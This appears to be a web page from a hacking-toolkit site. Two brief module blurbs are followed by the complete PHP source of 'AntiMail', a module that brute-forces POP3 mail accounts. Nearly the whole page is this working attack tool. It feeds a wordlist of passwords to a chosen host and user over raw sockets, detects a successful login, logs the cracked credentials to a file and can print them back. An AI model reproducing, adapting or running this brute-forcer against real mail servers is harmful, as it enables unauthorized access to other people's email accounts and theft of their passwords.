..modules you must have seen the iframes used for realtime result display. In this tutorial I'm going to show you how to insert them into your module and how they function. what we..
xAnalyze is a module that can search through corrupt data and configuration files in order to find the exact position of errors
<?php
/*
Handler for AntiMail
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
// set variable to be able to save a task
$_MODULE_C = "thc_am";
$_LOG = "accounts.php";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
$aFileData = array();
if(isset($_POST['submit'])){
switch($_POST['submit']){
// attempt to bruteforce default wpa key
case"Generate Attack":
echo $sOut;
if(!@extension_loaded("sockets")){
if(function_exists("dl")){
$sExtension = "";
if(strtoupper(substr(PHP_OS,0,3))==="WIN"){
$sExtension = "php_sockets.dll";
}
else{
$sExtension = "sockets.so";
}
if(!@dl($sExtension)){
die($sOut."No ftp support available, can't load extension.".$sEnd);
}
}
else{
die($sOut."No ftp support available.".$sEnd);
}
}
if($_POST['sUser']==""){
die("No user has been specified".$sEnd);
}
$iPort = intval($_POST['iPort']);
$iTimeout = intval($_POST['iTimeout']);
if(!is_int($iPort) || ($iPort<0 || $iPort>65535)){
$iPort = 21;
}
if(!is_int($iTimeout) || $iTimeout>90){
$iTimeout = 10;
}
// load wordlist
$sWordlist = ExploitFilter($_PATHS['wordlists_root']."/".$_POST['sWordlist'],0,1);
if(false===($aFileData = @file($sWordlist))){
die($sOut."Wordlist doesn't exist".$sEnd);
}
include_once($_PATHS['includes_root']."/task_start.php");
break;
// dump of cracked keys
case"Dump File":
echo $sOut;
if(!function_exists("RawToArray")){
include_once($_PATHS['functions_root']."/raw_to_array.php");
}
if(false==($aKeys = RawToArray($_LOG))){
echo"<b id=h7>[no passwords found yet]</b>";
}
else{
for($x=0;$x<count($aKeys);$x++){
echo"<b>".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][0])."</b> pass for user <b>".$aKeys[$x][1]."</b> is <b>".$aKeys[$x][2]."</b><br>\n";
}
}
echo $sEnd;
exit;
break;
// just show index
default:
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
}
else{
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
echo Screen("<br>\n<b>Running..</b><p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
echo Screen("<b>trying to connect with ".strip_tags($_POST['sHost']).":</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
flush();
ob_flush();
/*
Okidoki, now before we have a chit chat with mister mail server, we are gonna prepare the talk first.
The array below has three commands all used to keep talking to the mail server until the
proper password has been guessed.
*/
$iPC = 0;
$aPC = array();
$aPC[0] = "USER ".$_POST['sUser'];
$aPC[2] = "LIST";
$bGotcha = false;
for($x=0;$x<count($aFileData);$x++){
if($bGotcha){
// get the hell out of here
break;
}
$sPass = trim($aFileData[$x]);
$aPC[1] = "PASS ".$sPass;
if($iPC==0){
// only output success on first connection, we don't want too much output after all with a bruteforcer :)
echo Screen("<b>succesfully connected to host, trying to login:</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
$iPC = count($aPC);
}
if(false===($rConnect = @fsockopen($_POST['sHost'],$iPort,$sError,$iError,$iTimeout))){
echo Screen("Failed to establish connection with pop3 server",$_CONTEXT['verbose'],$_CONTEXT['silent']);
if($iError==110){
echo Screen(", try to increase the time-out value",$_CONTEXT['verbose'],$_CONTEXT['silent']);
}
echo Screen("<br>\n".$sError." - (".$iError.")",$_CONTEXT['verbose'],$_CONTEXT['silent']);
exit;
}
// follow the talk procedure
for($y=0;$y<$iPC;$y++){
// talk
@fputs($rConnect,$aPC[$y]."\r\n");
// response
$sGet = @fgets($rConnect,1024)."<br>\n";
echo Screen($sGet,$_CONTEXT['verbose'],$_CONTEXT['silent']);
if($iPC-1==$y){
// done, if we are able to get a mail list, then we have successfylly logged in, duh
$sResult = @substr($sGet,1,3);
if(@strtolower($sResult)=="err"){
echo Screen("[".date('H:i:s',time())."] attempt ".($x+1).": $sPass => <b id=h7>failed</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
ob_flush();
flush();
}
else{
$bGotcha = true;
if($_CONTEXT['log']==true){
WriteF($_LOG,time()."|".$_POST['sUser']."|".$sPass."\n");
}
echo Screen("[".date('H:i:s',time())."] attempt ".($x+1).": <b id=h6>login successful:</b> password is ".$sPass."\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
ob_flush();
flush();
@fclose($rConnect);
break;
}
}
}
@fclose($rConnect);
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
?>